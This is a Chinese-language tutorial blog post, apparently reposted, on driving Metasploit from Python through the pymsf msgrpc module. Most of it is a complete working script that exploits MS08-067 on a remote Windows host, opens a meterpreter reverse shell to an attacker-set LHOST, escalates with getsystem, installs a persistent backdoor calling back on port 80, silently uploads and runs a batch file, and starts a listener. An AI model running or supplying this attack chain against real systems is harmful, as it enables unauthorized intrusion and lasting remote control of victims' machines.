教你用Python玩转神器Metasploit

pymsf是著名安全研究团队Spiderlabs实现的一个Python与Metasploit msgrpc进行通信的python模块,通过它,你可以利用Python玩转渗透测试框架Metasploit。

使用步骤

首先你需要先启动msgrpc服务,命令如下:

load msgrpc Pass=<password>

与msgrpc进行通信其实就是与msfconsole进行通信,首先你需要创建一个msfrpc的类,登录到msgrpc服务器并且创建一个虚拟的终端,然后你就可以在你创建的虚拟终端上面执行多个命令的字符串.你可以调用模块的方法与console.write执行命令,并且通过”console.read”从虚拟终端上面读取输入的值.这篇文章将演示如何使用pymsf模块并且如何开发出一个完整的脚本.

这里有一个函数它创建了一个msfrpc实例,登录到msgrpc服务器,并且创建了一个虚拟终端.

def sploiter(RHOST, LHOST, LPORT, session):    client = msfrpc.Msfrpc({})    client.login('msf', '123')    ress = client.call('console.create')    console_id = ress['id']

下一步就是实现把多个字符串发给虚拟终端,通过console.write和console.read在虚拟终端显示与读取:

## Exploit MS08-067 ##commands = """use exploit/windows/smb/ms08_067_netapi set PAYLOAD windows/meterpreter/reverse_tcp set RHOST """+RHOST+""" set LHOST """+LHOST+""" set LPORT """+LPORT+""" set ExitOnSession false exploit -z """print "[+] Exploiting MS08-067 on: "+RHOST client.call('console.write',[console_id,commands])res = client.call('console.read',[console_id])result = res['data'].split('\n')

上面的这一小段代码创建了一个MSF的资源文件,这样你就可以通过”resoucen”命令去执行指定文件里面中一系列的命令。

下面我们将通过”getsystem”命令把这个文件的提权,建立一个后门打开80端口来转发.并且永久的运行.最后上传我们的漏洞exp并且在命令模式下面悄悄的安装:

# 这个函数会创建一个MSF .rc文件def builder(RHOST, LHOST, LPORT):     post = open('/tmp/smbpost.rc', 'w')     bat = open('/tmp/ms08067_install.bat', 'w')     postcomms = """getsystem run persistence -S -U -X -i 10 -p 80 -r """+LHOST+""" cd c:\\ upload /tmp/ms08067_patch.exe c:\\ upload /tmp/ms08067_install.bat c:\\ execute -f ms08067_install.bat """     batcomm = "ms08067_patch.exe /quiet"     post.write(postcomms); bat.write(batcomm)     post.close(); bat.close()

通过上面的那段代码,将会创建一个.rc的文件.通过msf模块“post/multi/gather/run_console_rc_file”在当前的meterpreter会话中运行生成的文件,并且通过console.write命令从虚拟终端写入数据,通过console.read命令来回显返回内容:

## 运行生成的exp ##runPost = """use post/multi/gather/run_console_rc_file set RESOURCE /tmp/smbpost.rc set SESSION """+session+""" exploit """     print "[+] Running post-exploit script on: "+RHOST      client.call('console.write',[console_id,runPost])     rres = client.call('console.read',[console_id])## Setup Listener for presistent connection back over port 80 ##     sleep(10)     listen = """use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 80 set LHOST """+LHOST+""" exploit """print "[+] Setting up listener on: "+LHOST+":80"client.call('console.write',[console_id,listen])lres = client.call('console.read',[console_id])print lres

上面代码中的变量(RHOST, LHOST,LPORT等)都是通过optparse模块从命令终端输入的,完整的脚本托管在github上面,有时候你需要知道脚本的生成的地方都是静态地址,不会在其他的目录生成,例如ms08067的补丁就会在你的/tmp/目录下面。

大家只要知道基础然后对下面的代码进行一定的修改就可以编程一个属于你自己的msf自动化攻击脚本,我们建议通过博客里面发表的一些简单的例子出发,然后自己写一个msf攻击脚本:

import os, msfrpc, optparse, sys, subprocess from time import sleep # Function to create the MSF .rc filesdef builder(RHOST, LHOST, LPORT):     post = open('/tmp/smbpost.rc', 'w')     bat = open('/tmp/ms08067_install.bat', 'w')     postcomms = """getsystem run persistence -S -U -X -i 10 -p 80 -r """+LHOST+""" cd c:\\ upload /tmp/ms08067_patch.exe c:\\ upload /tmp/ms08067_install.bat c:\\ execute -f ms08067_install.bat """     batcomm = "ms08067_patch.exe /quiet"     post.write(postcomms); bat.write(batcomm)     post.close(); bat.close()# Exploits the chain of rc files to exploit MS08-067, setup persistence, and patchdef sploiter(RHOST, LHOST, LPORT, session):     client = msfrpc.Msfrpc({})        client.login('msf', '123')        ress = client.call('console.create')        console_id = ress['id']## Exploit MS08-067 ##     commands = """use exploit/windows/smb/ms08_067_netapi set PAYLOAD windows/meterpreter/reverse_tcp set RHOST """+RHOST+""" set LHOST """+LHOST+""" set LPORT """+LPORT+""" set ExitOnSession false exploit -z """     print "[+] Exploiting MS08-067 on: "+RHOST      client.call('console.write',[console_id,commands])     res = client.call('console.read',[console_id])     result = res['data'].split('\n')## Run Post-exploit script ##     runPost = """use post/multi/gather/run_console_rc_file set RESOURCE /tmp/smbpost.rc set SESSION """+session+""" exploit """     print "[+] Running post-exploit script on: "+RHOST      client.call('console.write',[console_id,runPost])     rres = client.call('console.read',[console_id])## Setup Listener for presistent connection back over port 80 ##     sleep(10)     listen = """use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 80 set LHOST """+LHOST+""" exploit """     print "[+] Setting up listener on: "+LHOST+":80"     client.call('console.write',[console_id,listen])     lres = client.call('console.read',[console_id])     print lres def main():        parser = optparse.OptionParser(sys.argv[0] +\         ' -p LPORT -r RHOST -l LHOST')        parser.add_option('-p', dest='LPORT', type='string', \         help ='specify a port to listen on')        parser.add_option('-r', dest='RHOST', type='string', \         help='Specify a remote host')        parser.add_option('-l', dest='LHOST', type='string', \         help='Specify a local host')     parser.add_option('-s', dest='session', type='string', \         help ='specify session ID')     (options, args) = parser.parse_args()     session=options.session      RHOST=options.RHOST; LHOST=options.LHOST; LPORT=options.LPORT      if (RHOST == None) and (LPORT == None) and (LHOST == None):                print parser.usage                 sys.exit(0)     builder(RHOST, LHOST, LPORT)     sploiter(RHOST, LHOST, LPORT, session)if __name__ == "__main__":      main()

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/123217.html<

(0)
运维的头像运维
上一篇2025-02-22 17:09
下一篇 2025-02-22 17:10

相关推荐

  • 个人主题怎么制作?

    制作个人主题是一个将个人风格、兴趣或专业领域转化为视觉化或结构化内容的过程,无论是用于个人博客、作品集、社交媒体账号还是品牌形象,核心都是围绕“个人特色”展开,以下从定位、内容规划、视觉设计、技术实现四个维度,详细拆解制作个人主题的完整流程,明确主题定位:找到个人特色的核心主题定位是所有工作的起点,需要先回答……

    2025-11-20
    0
  • 社群营销管理关键是什么?

    社群营销的核心在于通过建立有温度、有价值、有归属感的社群,实现用户留存、转化和品牌传播,其管理需贯穿“目标定位-内容运营-用户互动-数据驱动-风险控制”全流程,以下从五个维度展开详细说明:明确社群定位与目标社群管理的首要任务是精准定位,需明确社群的核心价值(如行业交流、产品使用指导、兴趣分享等)、目标用户画像……

    2025-11-20
    0
  • 香港公司网站备案需要什么材料?

    香港公司进行网站备案是一个涉及多部门协调、流程相对严谨的过程,尤其需兼顾中国内地与香港两地的监管要求,由于香港公司注册地与中国内地不同,其网站若主要服务内地用户或使用内地服务器,需根据服务器位置、网站内容性质等,选择对应的备案路径(如工信部ICP备案或公安备案),以下从备案主体资格、流程步骤、材料准备、注意事项……

    2025-11-20
    0
  • 如何企业上云推广

    企业上云已成为数字化转型的核心战略,但推广过程中需结合行业特性、企业痛点与市场需求,构建系统性、多维度的推广体系,以下从市场定位、策略设计、执行落地及效果优化四个维度,详细拆解企业上云推广的实践路径,精准定位:明确目标企业与核心价值企业上云并非“一刀切”的方案,需先锁定目标客户群体,提炼差异化价值主张,客户分层……

    2025-11-20
    0
  • PS设计搜索框的实用技巧有哪些?

    在PS中设计一个美观且功能性的搜索框需要结合创意构思、视觉设计和用户体验考量,以下从设计思路、制作步骤、细节优化及交互预览等方面详细说明,帮助打造符合需求的搜索框,设计前的规划明确使用场景:根据网站或APP的整体风格确定搜索框的调性,例如极简风适合细线条和纯色,科技感适合渐变和发光效果,电商类则可能需要突出搜索……

    2025-11-20
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注